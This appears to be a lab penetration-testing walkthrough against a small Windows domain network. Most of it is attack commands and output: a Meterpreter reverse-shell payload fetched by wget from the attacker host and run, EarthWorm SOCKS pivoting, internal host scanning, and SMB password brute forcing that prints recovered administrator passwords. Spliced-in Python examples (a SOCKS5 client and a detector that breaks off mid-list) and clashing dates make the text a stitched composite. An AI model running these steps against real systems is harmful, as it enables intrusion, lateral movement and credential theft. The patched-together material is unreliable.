[*] Sending stage (3045348 bytes) to 192.168.1.21
[*] Meterpreter session 4 opened (192.168.1.25:4444 -> 192.168.1.21:41080) at 2023-12-04 08:26:03 +0800

msf6 exploit(multi/script/web_delivery) > sessions

Active sessions
===============

  Id  Name  Type                   Information                       Connection
  --  ----  ----                   -----------                       ----------
  4         meterpreter x64/linux  firefart @ localhost.localdomain  192.168.1.25:4444 -> 192.168.1.21:41080 (192.168.1.21)
  
  
  
  
  Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  80               yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.25     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   7   Linux



View the full module info with the info, or info -d command.

msf6 exploit(multi/script/web_delivery) >


[firefart@localhost tmp]# wget -qO msAjJhyl --no-check-certificate http://192.168.1.25/0796Iv35A4; chmod +x msAjJhyl; ./msAjJhyl& disown
[1] 12342


2. Enter meterpreter

msf6 exploit(multi/script/web_delivery) > sessions

Active sessions
===============

  Id  Name  Type                   Information                       Connection
  --  ----  ----                   -----------                       ----------
  4         meterpreter x64/linux  firefart @ localhost.localdomain  192.168.1.25:4444 -> 192.168.1.21:41080 (192.168.1.21)


msf6 exploit(multi/script/web_delivery) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > getuid
Server username: firefart
meterpreter >


3. Add an internal route

meterpreter > background
[*] Backgrounding session 4...
msf6 exploit(multi/script/web_delivery) > sessions

Active sessions
===============

  Id  Name  Type                  Information            Connection
  --  ----  ----                  -----------            ----------
  4         meterpreter x64/linu  firefart @ localhost.  192.168.1.25:4444 ->
            x                     localdomain            192.168.1.21:41080 (1
                                                         92.168.1.21)

msf6 exploit(multi/script/web_delivery) >


msf6 exploit(multi/script/web_delivery) > route add 192.168.93.0 255.255.255.0 4
[*] Route already exists
msf6 exploit(multi/script/web_delivery) >

# destination network 192.168.93.0, netmask 255.255.255.0, next hop session 4 (the route already exists because autoroute added it through session 1 earlier)

4. SOCKS5 proxy

Everything so far (listener, route) happened inside msfconsole. The route only carries msfconsole's own modules into the internal network; to bring the other tools on the attacker box in as well, a SOCKS proxy is needed.

Build a reverse SOCKS5 proxy with EarthWorm (ew)

1. EarthWorm pivoting tool
./ew_for_linux64 -s rcsocks -l 9898 -e 6767
  # rcsocks on the attacker: listen on 9898 for local SOCKS5 clients and on 6767
  # for the reverse connection from rssocks; traffic arriving on 9898 is relayed over 6767
  # rcsocks / rssocks form the reverse-connection pair
  # ssocks is the forward (direct) SOCKS server
  # -l local listening port
  # -e port that the other side connects back to (reverse mode)
  # -d IP of the machine to connect back to
  # -f IP of the machine to connect to actively (forward mode)
  # -g port of the machine to connect to actively (forward mode)
  # -t timeout, default 1000

^C[firefart@localhost tmp]# ls
dirty  dirty.c  passwd.bak  shell.elf  yum.log
[firefart@localhost tmp]# wget http://192.168.1.25:8080/ew_for_linux64
--2019-10-07 13:22:27--  http://192.168.1.25:8080/ew_for_linux64
Connecting to 192.168.1.25:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28080 (27K) [application/octet-stream]
Saving to: 'ew_for_linux64'

100%[======================================>] 28,080      --.-K/s   in 0.001s

2019-10-07 13:22:27 (34.7 MB/s) - 'ew_for_linux64' saved [28080/28080]

[firefart@localhost tmp]# ls
dirty  dirty.c  ew_for_linux64  passwd.bak  shell.elf  yum.log
[firefart@localhost tmp]# chmod +x ew_for_linux64
[firefart@localhost tmp]# ls
dirty  dirty.c  ew_for_linux64  passwd.bak  shell.elf  yum.log
[firefart@localhost tmp]#


┌──(root?ru)-[~/…/neiwang/EarthWorm/download/products]
└─# ./ew_for_linux64 -s rcsocks -l 9898 -e 6767
rcsocks 0.0.0.0:5656 <--[10000 usec]--> 0.0.0.0:6767
init cmd_server_for_rc here
start listen port here
rssocks cmd_socket OK!

[firefart@localhost tmp]# ./ew_for_linux64 -s rssocks -d 192.168.1.25 -e 6767
rssocks 192.168.1.25:6767 <--[10000 usec]--> socks server



2. Configure proxychains4.conf
┌──(root?ru)-[~/lianxi]
└─# cat /etc/proxychains4.conf | grep "socks5"
#               socks5  192.168.67.78   1080    lamer   secret
#       proxy types: http, socks4, socks5, raw
#socks5         127.0.0.1 2222
#socks5   116.211.207.100 8080
socks5          127.0.0.1 9898


The socks5 line points proxychains at 127.0.0.1:9898. rcsocks accepts those connections on 9898 and relays them over the 6767 control channel to rssocks on the CentOS host, which opens the real connections inside 192.168.93.0/24. Any program started under proxychains therefore reaches the internal network. One check before relying on it: the rcsocks banner above prints 5656 as its listening port, which does not match the -l 9898 given on the command line; the proxychains entry must match whatever -l value was actually used, otherwise every proxied connection fails immediately.
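What proxychains actually does for each connection is a short SOCKS5 exchange (RFC 1928, no authentication) with rcsocks on 127.0.0.1:9898. The following is an added example, not part of the original post and not EarthWorm's or proxychains' own code: it builds the client messages, parses the proxy's replies, and drives the whole exchange over a socket, so a proxy chain that "does not work" can be checked byte by byte. The fake proxy at the bottom is a constructed stand-in for rcsocks that runs on a local socket pair; the internal addresses used in the demonstration are the ones from this page.

```python
import ipaddress
import socket
import struct
import threading

# Added example, not part of the original post and not EarthWorm/proxychains
# code. It spells out the SOCKS5 exchange (RFC 1928, no authentication) that
# proxychains performs with rcsocks on 127.0.0.1:9898 for every connection.
# exchange_with_fake_proxy() is a constructed stand-in for rcsocks.

REPLY_CODES = {
    0: "succeeded", 1: "general SOCKS server failure",
    2: "connection not allowed by ruleset", 3: "network unreachable",
    4: "host unreachable", 5: "connection refused", 6: "TTL expired",
    7: "command not supported", 8: "address type not supported",
}


def greeting() -> bytes:
    """Client hello: VER=5, NMETHODS=1, METHODS=[0x00 'no authentication']."""
    return b"\x05\x01\x00"


def connect_request(host: str, port: int) -> bytes:
    """CONNECT request: VER CMD=1 RSV ATYP DST.ADDR DST.PORT (port big-endian)."""
    try:
        ip = ipaddress.ip_address(host)
        addr = (b"\x01" if ip.version == 4 else b"\x04") + ip.packed
    except ValueError:  # not an IP literal: send the name and let the proxy resolve it
        name = host.encode("idna")
        if len(name) > 255:
            raise ValueError("hostname too long for SOCKS5")
        addr = b"\x03" + bytes([len(name)]) + name
    return b"\x05\x01\x00" + addr + struct.pack("!H", port)


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection mid-handshake")
        buf += chunk
    return buf


def parse_reply(data: bytes) -> dict:
    """Server reply: VER REP RSV ATYP BND.ADDR BND.PORT."""
    if len(data) < 4 or data[0] != 5:
        raise ValueError("not a SOCKS5 reply")
    rep, atyp = data[1], data[3]
    if atyp == 1:
        end, addr = 8, str(ipaddress.IPv4Address(data[4:8]))
    elif atyp == 4:
        end, addr = 20, str(ipaddress.IPv6Address(data[4:20]))
    elif atyp == 3:
        end, addr = 5 + data[4], data[5:5 + data[4]].decode()
    else:
        raise ValueError(f"unknown ATYP {atyp}")
    (port,) = struct.unpack("!H", data[end:end + 2])
    return {"ok": rep == 0, "status": REPLY_CODES.get(rep, f"unknown({rep})"),
            "bound": (addr, port)}


def socks5_connect(sock: socket.socket, host: str, port: int) -> dict:
    """Run the whole exchange on an already-connected socket to the proxy."""
    sock.sendall(greeting())
    ver, method = _recv_exact(sock, 2)
    if ver != 5 or method == 0xFF:
        raise ConnectionError("proxy rejected 'no authentication'")
    sock.sendall(connect_request(host, port))
    head = _recv_exact(sock, 4)            # VER REP RSV ATYP, then a variable-length address
    atyp = head[3]
    if atyp == 1:
        rest = _recv_exact(sock, 4 + 2)
    elif atyp == 4:
        rest = _recv_exact(sock, 16 + 2)
    elif atyp == 3:
        n = _recv_exact(sock, 1)
        rest = n + _recv_exact(sock, n[0] + 2)
    else:
        raise ValueError(f"unknown ATYP {atyp}")
    return parse_reply(head + rest)


def exchange_with_fake_proxy(host: str, port: int, reply: bytes) -> dict:
    """Constructed stand-in for rcsocks: accepts 'no auth', then sends the given reply."""
    client, server = socket.socketpair()

    def proxy_side():
        assert _recv_exact(server, 3) == greeting()
        server.sendall(b"\x05\x00")
        _recv_exact(server, len(connect_request(host, port)))
        server.sendall(reply)
        server.close()

    t = threading.Thread(target=proxy_side)
    t.start()
    try:
        return socks5_connect(client, host, port)
    finally:
        client.close()
        t.join()


if __name__ == "__main__":
    ok = b"\x05\x00\x00\x01\x7f\x00\x00\x01" + struct.pack("!H", 9898)
    print(exchange_with_fake_proxy("192.168.93.10", 445, ok))
    refused = b"\x05\x05\x00\x01" + b"\x00" * 6
    print(exchange_with_fake_proxy("192.168.93.30", 445, refused))
```

To test the real chain, open a TCP socket to 127.0.0.1:9898 and hand it to socks5_connect() with an internal target such as 192.168.93.20:1433: a reply of "connection refused" or "host unreachable" means rcsocks and rssocks are talking but the target is closed, whereas a ConnectionError during the greeting means nothing is listening on the port proxychains was pointed at.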

5. Internal host discovery

1. First module
msf6 exploit(multi/script/web_delivery) > use auxiliary/scanner/discovery/udp_probe
msf6 auxiliary(scanner/discovery/udp_probe) > show options

Module options (auxiliary/scanner/discovery/udp_probe):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   THREADS  1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/discovery/udp_probe) > set rhost 192.168.93.0-255
rhost => 192.168.93.0-255
msf6 auxiliary(scanner/discovery/udp_probe) > set THREADS 5
THREADS => 5
msf6 auxiliary(scanner/discovery/udp_probe) >


msf6 auxiliary(scanner/discovery/udp_probe) > run

[-] Unknown error: 192.168.93.0:5632 Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1 ["/usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb:38:in `open'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:143:in `create_udp_channel'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:96:in `create'", "/usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:587:in `create'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket.rb:51:in `create_param'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket/udp.rb:39:in `create_param'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket/udp.rb:30:in `create'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:76:in `block in run_host'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:66:in `each'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:66:in `run_host'", "/usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'", "/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'"]
[+] Discovered DNS on 192.168.93.10:53 (Microsoft DNS)
[+] Discovered NetBIOS on 192.168.93.10:137 (WIN-8GA56TNV3MV:<00>:U :TEST:<00>:G :TEST:<1c>:G :WIN-8GA56TNV3MV:<20>:U :TEST:<1b>:U :00:0c:29:1f:54:d2)
[+] Discovered NTP on 192.168.93.10:123 (1c0104fa00000000000a16634c4f434ce9179267a83fa2adc54f234b71b152f3e917aaa60c16aceae917aaa60c16acea)
[+] Discovered NetBIOS on 192.168.93.20:137 (WIN2008:<00>:U :TEST:<00>:G :WIN2008:<20>:U :00:0c:29:ab:44:ec)
[+] Discovered MSSQL on 192.168.93.20:1434 (ServerName=WIN2008 InstanceName=MSSQLSERVER IsClustered=No Version=10.0.1600.22 tcp=1433 )
[*] Scanned  26 of 256 hosts (10% complete)
[+] Discovered NetBIOS on 192.168.93.30:137 (WIN7:<20>:U :WIN7:<00>:U :TEST:<00>:G :TEST:<1e>:G :TEST:<1d>:U :__MSBROWSE__:<01>:G :00:0c:29:e0:74:2b)
[*] Scanned  52 of 256 hosts (20% complete)
[*] Scanned  77 of 256 hosts (30% complete)
[*] Scanned 104 of 256 hosts (40% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[-] Unknown error: 192.168.93.255:5632 Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1 ["/usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb:38:in `open'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:143:in `create_udp_channel'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:96:in `create'", "/usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:587:in `create'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket.rb:51:in `create_param'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket/udp.rb:39:in `create_param'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket/udp.rb:30:in `create'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:76:in `block in run_host'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:66:in `each'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:66:in `run_host'", "/usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'", "/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'"]
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed


Three internal hosts were found:

192.168.93.10
192.168.93.20
192.168.93.30


2. Second module
msf6 auxiliary(scanner/discovery/udp_probe) > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   THREADS  1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.93.0-255
rhosts => 192.168.93.0-255
msf6 auxiliary(scanner/smb/smb_version) > set THREADS 5
THREADS => 5
msf6 auxiliary(scanner/smb/smb_version) > run

[-] 192.168.93.0:445      - 192.168.93.0: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.0:139      - 192.168.93.0: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.1:445      - 192.168.93.1: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.2:445      - 192.168.93.2: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.4:445      - 192.168.93.4: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.3:445      - 192.168.93.3: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.5:445      - 192.168.93.5: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.1:139      - 192.168.93.1: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.2:139      - 192.168.93.2: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.4:139      - 192.168.93.4: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.5:139      - 192.168.93.5: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.3:139      - 192.168.93.3: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.6:445      - 192.168.93.6: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.7:445      - 192.168.93.7: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.8:445      - 192.168.93.8: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.9:445      - 192.168.93.9: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[*] 192.168.93.10:445     - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:required) (uptime:1w 2d 19h 13m 13s) (guid:{74fd7a72-fc98-4951-9b1b-01e0f1cf7935}) (authentication domain:TEST)Windows 2012 R2 Datacenter (build:9600) (name:WIN-8GA56TNV3MV) (domain:TEST)
[+] 192.168.93.10:445     -   Host is running SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:required) (uptime:1w 2d 19h 13m 13s) (guid:{74fd7a72-fc98-4951-9b1b-01e0f1cf7935}) (authentication domain:TEST)Windows 2012 R2 Datacenter (build:9600) (name:WIN-8GA56TNV3MV) (domain:TEST)
[-] 192.168.93.6:139      - 192.168.93.6: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.7:139      - 192.168.93.7: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.9:139      - 192.168.93.9: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.8:139      - 192.168.93.8: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.12:445     - 192.168.93.12: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.11:445     - 192.168.93.11: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.13:445     - 192.168.93.13: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.14:445     - 192.168.93.14: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.15:445     - 192.168.93.15: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.12:139     - 192.168.93.12: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.11:139     - 192.168.93.11: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.13:139     - 192.168.93.13: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.14:139     - 192.168.93.14: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.15:139     - 192.168.93.15: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[*] 192.168.93.20:445     - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.0.2) (signatures:optional) (uptime:207w 1d 13h 49m 52s) (guid:{f9644969-0bf4-48c7-ab87-58ba8044ed81}) (authentication domain:TEST)Windows 2008 Datacenter SP2 (build:6003) (name:WIN2008) (domain:TEST)
[+] 192.168.93.20:445     -   Host is running SMB Detected (versions:1, 2) (preferred dialect:SMB 2.0.2) (signatures:optional) (uptime:207w 1d 13h 49m 52s) (guid:{f9644969-0bf4-48c7-ab87-58ba8044ed81}) (authentication domain:TEST)Windows 2008 Datacenter SP2 (build:6003) (name:WIN2008) (domain:TEST)
[-] 192.168.93.16:445     - 192.168.93.16: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.17:445     - 192.168.93.17: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.18:445     - 192.168.93.18: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.19:445     - 192.168.93.19: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.16:139     - 192.168.93.16: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.17:139     - 192.168.93.17: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.18:139     - 192.168.93.18: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.19:139     - 192.168.93.19: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.21:445     - 192.168.93.21: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.22:445     - 192.168.93.22: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.23:445     - 192.168.93.23: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.24:445     - 192.168.93.24: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.25:445     - 192.168.93.25: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.21:139     - 192.168.93.21: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.22:139     - 192.168.93.22: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.23:139     - 192.168.93.23: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.24:139     - 192.168.93.24: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.25:139     - 192.168.93.25: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[*] 192.168.93.0-255:     - Scanned  26 of 256 hosts (10% complete)
[-] 192.168.93.26:445     - 192.168.93.26: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[*] 192.168.93.30:445     - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:213w 4d 10h 36m 33s) (guid:{5cc9a08c-4395-4e1d-95be-f93ec2195144}) (authentication domain:TEST)Windows 7 Professional SP1 (build:7601) (name:WIN7) (domain:TEST)
[+] 192.168.93.30:445     -   Host is running SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:213w 4d 10h 36m 33s) (guid:{5cc9a08c-4395-4e1d-95be-f93ec2195144}) (authentication domain:TEST)Windows 7 Professional SP1 (build:7601) (name:WIN7) (domain:TEST)


Still the same three internal hosts:

192.168.93.10    name:WIN-8GA56TNV3MV  domain:TEST
192.168.93.20    name:WIN2008          domain:TEST
192.168.93.30    name:WIN7             domain:TEST


6. Attacking the internal network

1. Password brute forcing
Use the auxiliary/scanner/smb/smb_login module to brute force the SMB passwords of 192.168.93.10/20/30.


msf6 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > show options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING   none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS                              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE                           no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_login) > set SMBUser administrator
SMBUser => administrator
msf6 auxiliary(scanner/smb/smb_login) > run

[-] Msf::OptionValidateError The following options failed to validate: RHOSTS
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.30
rhosts => 192.168.93.30
msf6 auxiliary(scanner/smb/smb_login) > run

[*] 192.168.93.30:445     - 192.168.93.10:445 - Starting SMB login bruteforce
[*] 192.168.93.30:445     - Error: 192.168.93.30: Metasploit::Framework::LoginScanner::Invalid Cred details can't be blank, Cred details can't be blank (Metasploit::Framework::LoginScanner::SMB)
[*] 192.168.93.30:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) >

This error occurs because no password wordlist has been loaded yet.

msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
PASS_FILE => /usr/share/wordlists/rockyou.txt

msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.30
rhosts => 192.168.93.30
msf6 auxiliary(scanner/smb/smb_login) > run


msf6 auxiliary(scanner/smb/smb_login) > run

[*] 192.168.93.30:445     - 192.168.93.30:445 - Starting SMB login bruteforce
[-] 192.168.93.30:445     - 192.168.93.30:445 - Failed: '.\administrator:This is not a password',
[!] 192.168.93.30:445     - No active DB -- Credential data will not be saved!
[-] 192.168.93.30:445     - 192.168.93.30:445 - Failed: '.\administrator:zxcASDqwe!ASD',
[+] 192.168.93.30:445     - 192.168.93.30:445 - Success: '.\administrator:123qwe!ASD' Administrator


msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.20
rhosts => 192.168.93.20
msf6 auxiliary(scanner/smb/smb_login) > run

[*] 192.168.93.20:445     - 192.168.93.20:445 - Starting SMB login bruteforce
[-] 192.168.93.20:445     - 192.168.93.20:445 - Failed: '.\administrator:This is not a password',
[!] 192.168.93.20:445     - No active DB -- Credential data will not be saved!
[-] 192.168.93.20:445     - 192.168.93.20:445 - Failed: '.\administrator:zxcASDqwe!ASD',
[+] 192.168.93.20:445     - 192.168.93.20:445 - Success: '.\administrator:123qwe!ASD' Administrator
^C[*] 192.168.93.20:445     - Caught interrupt from the console...
[*] Auxiliary module execution completed


msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.10

msf6 auxiliary(scanner/smb/smb_login) > run

[*] 192.168.93.10:445     - 192.168.93.10:445 - Starting SMB login bruteforce
[-] 192.168.93.10:445     - 192.168.93.10:445 - Failed: '.\administrator:This is not a password',
[!] 192.168.93.10:445     - No active DB -- Credential data will not be saved!
[+] 192.168.93.10:445     - 192.168.93.10:445 - Success: '.\administrator:zxcASDqw123!!' Administrator
^C[*] 192.168.93.10:445     - Caught interrupt from the console...
[*] Auxiliary module execution completed

192.168.93.30  administrator:123qwe!ASD
192.168.93.20  administrator:123qwe!ASD  
192.168.93.10  administrator:zxcASDqw123!!


With that we have the passwords for all three hosts.
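Added example, not part of the original post: a small Python detector for the trace the smb_login run above leaves on each target, namely a burst of failed network logons (Security event 4625, logon type 3) from one source followed by a success (4624). The log records are constructed; the source address 192.168.93.100 is the CentOS pivot the SMB traffic came through in this lab, and the thresholds and field layout are assumptions.

```python
"""Detect SMB password brute forcing from Windows Security log events.

Added example (not from the original post). The events below are constructed to
mirror the smb_login run in the walkthrough: the pivot host (192.168.93.100)
fails several logons against a domain host and then succeeds. Event 4625 is a
failed logon, 4624 a successful one; LogonType 3 (network) is what an SMB
authentication attempt produces on the target.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample events:
# (timestamp, event_id, target_host, source_ip, target_user, logon_type)
SAMPLE_EVENTS = [
    ("2023-12-04T10:20:01", 4625, "WIN7", "192.168.93.100", "administrator", 3),
    ("2023-12-04T10:20:02", 4625, "WIN7", "192.168.93.100", "administrator", 3),
    ("2023-12-04T10:20:03", 4625, "WIN7", "192.168.93.100", "administrator", 3),
    ("2023-12-04T10:20:04", 4624, "WIN7", "192.168.93.100", "administrator", 3),
    ("2023-12-04T10:21:10", 4625, "WIN2008", "192.168.93.100", "administrator", 3),
    ("2023-12-04T10:21:11", 4625, "WIN2008", "192.168.93.100", "administrator", 3),
    ("2023-12-04T10:21:12", 4624, "WIN2008", "192.168.93.100", "administrator", 3),
    # A user mistyping once and then logging in: must not alert.
    ("2023-12-04T10:25:00", 4625, "WIN-8GA56TNV3MV", "192.168.93.20", "win2008", 3),
    ("2023-12-04T10:25:30", 4624, "WIN-8GA56TNV3MV", "192.168.93.20", "win2008", 3),
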